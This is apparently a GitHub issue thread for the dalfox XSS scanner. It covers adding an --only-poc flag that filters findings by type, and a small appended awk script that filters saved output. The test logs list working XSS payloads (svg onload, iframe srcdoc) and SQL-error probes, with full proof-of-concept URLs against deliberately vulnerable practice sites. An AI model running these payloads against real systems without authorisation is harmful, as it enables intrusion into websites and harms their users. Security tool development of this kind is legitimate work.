Add option not to show [R] #246

Closed
hahwul opened this issue Jul 2, 2021 · 2 comments

hahwul commented Jul 2, 2021

from @leo__rac

Hi! Is there an option on dalfox to skip the [R] findings?
Or grepping on result is the only possibility right now?

hahwul commented Jul 3, 2021

flag name:

  • --verbose "g,r,v"
  • --filter= "g,r,v"
  • --match= "g,r,v"
  • --only-poc="g,r,v"


hahwul commented Jul 3, 2021

Test

$  ./dalfox url https://xss-game.appspot.com/level1/frame\?d\=fd --only-poc r
[I] Reflected query param => Injected: /inHTML-none(1)  $  {  `  +  '  (  "  .  )  }  >  -  ]  [  |  <  ;  :  =  \  ,
    13 line:  Sorry, no results were found for <b>DalFox</b>. <a href='?'>Try again
[V] Triggered XSS Payload (found DOM Object): query=</script><svg><script/class=dalfox>alert(1)</script>-%26apos;
    13 line:  s were found for <b></script><svg><script/class=dalfox>alert(1)</script>-%26apos
[*] Finish Scaneries][99.65%] Passing "query" param queries and waiting headless
$  ./dalfox url https://xss-game.appspot.com/level1/frame\?d\=fd --only-poc v
[I] Reflected query param => Injected: /inHTML-none(1)  '  {  )  (  -  |  [  \  .  ,  +  :  "  $  }  =  ]  ;  <  `  >
    13 line:  Sorry, no results were found for <b>DalFox</b>. <a href='?'>Try again
[V] Triggered XSS Payload (found DOM Object): query='"><iframe srcdoc="<input onauxclick=alert(1)>" class=dalfox></iframe>
    13 line:  s were found for <b>'"><iframe srcdoc="<input onauxclick=alert(1)>" class=dalfox
[POC][V][GET] https://xss-game.appspot.com/level1/frame?d=fd&query=%27%22%3E%3Ciframe+srcdoc%3D%22%3Cinput+onauxclick%3Dalert%281%29%3E%22+class%3Ddalfox%3E%3C%2Fiframe%3E

multiple case

$ ./dalfox url http://testphp.vulnweb.com/listproducts.php --only-poc g,r
[G] Found dalfox-error-mysql via built-in grepping / original request
    Warning: mysql_fetch_array() expects parameter 1 to be resource, null given in /hj/var/www/listproducts.php on line 74
[POC][G][BUILT-IN/dalfox-error-mysql/GET] http://testphp.vulnweb.com/listproducts.php
[G] Found dalfox-error-mysql2 via built-in grepping / original request
    Warning: mysql
[POC][G][BUILT-IN/dalfox-error-mysql2/GET] http://testphp.vulnweb.com/listproducts.php
[I] Found 2 testing point in DOM base parameter mining
[G] Found dalfox-error-mysql1 via built-in grepping / payload: dalfox:
    SQL syntax; check the manual that corresponds to your MySQL
[POC][G][BUILT-IN/dalfox-error-mysql1/GET] http://testphp.vulnweb.com/listproducts.php?cat=dalfox%3A
[G] Found dalfox-error-mysql5 via built-in grepping / payload: dalfox:
    check the manual that corresponds to your MySQL server version
[POC][G][BUILT-IN/dalfox-error-mysql5/GET] http://testphp.vulnweb.com/listproducts.php?cat=dalfox%3A
[I] Found 1 testing point in Dictionary base paramter mining
[I] Content-Type is text/html; charset=UTF-8
[I] Reflected cat param => Injected: /inHTML-none(1)  $
    48 line:  	Error: Unknown column 'DalFox' in 'where cl
[W] Reflected Payload in HTML: cat=<sVg/onload=prompt(1)>
    48 line:  yntax to use near '=<sVg/onload=prompt(1)>' at line 1
[POC][R][GET] http://testphp.vulnweb.com/listproducts.php?cat=%3CsVg%2Fonload%3Dprompt%281%29%3E
[V] Triggered XSS Payload (found DOM Object): cat='><sVg/onload=alert(1) class=dalfox>
    48 line:  syntax to use near ''><sVg/onload=alert(1) class=dalfox>' at line 1

@hahwul hahwul closed this as completed in 5e8e0f5 Jul 3, 2021
hahwul added a commit that referenced this issue Jul 3, 2021
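
For output that was already saved before this flag existed, the same type selection can be applied to the `[POC]` lines after the fact. This is an added example, not part of the issue thread or of dalfox's own code; the names `filter_poc` and `sample_log` and the `example.test` URLs are assumptions, and the sample lines are constructed in the format of the test output above.

```shell
#!/bin/sh
# Added example (not dalfox code): filter saved scanner output by PoC type,
# using the same comma-separated type list as in the thread ("g,r,v").

# Constructed sample in the "[POC][TYPE][...] URL" format shown in the thread.
sample_log() {
    cat <<'EOF'
[G] Found dalfox-error-mysql via built-in grepping / original request
[POC][G][BUILT-IN/dalfox-error-mysql/GET] http://app.example.test/list.php
[I] Content-Type is text/html; charset=UTF-8
[W] Reflected Payload in HTML: cat=PLACEHOLDER
[POC][R][GET] http://app.example.test/list.php?cat=PLACEHOLDER
[V] Triggered XSS Payload (found DOM Object): cat=PLACEHOLDER
[POC][V][GET] http://app.example.test/list.php?cat=PLACEHOLDER2
EOF
}

# filter_poc TYPES < saved-output
#   TYPES: comma-separated, case-insensitive subset of g,r,v
#   Prints only the [POC] lines whose type is listed; log lines are dropped.
#   Exits with status 2 on an unknown type so a typo cannot hide findings.
filter_poc() {
    awk -v types="$1" '
    BEGIN {
        n = split(toupper(types), t, ",")
        for (i = 1; i <= n; i++) {
            gsub(/[ \t]/, "", t[i])
            if (t[i] !~ /^[GRV]$/) {
                printf "filter_poc: unknown type \"%s\"\n", t[i] > "/dev/stderr"
                exit 2
            }
            want[t[i]] = 1
        }
    }
    # The type letter is the 7th character of a line starting "[POC][X]".
    /^\[POC\]\[[A-Z]\]/ {
        if (substr($0, 7, 1) in want) print
    }'
}

# Keep grepping (G) and reflected (R) PoCs, drop verified (V) ones.
sample_log | filter_poc "g,r"
```
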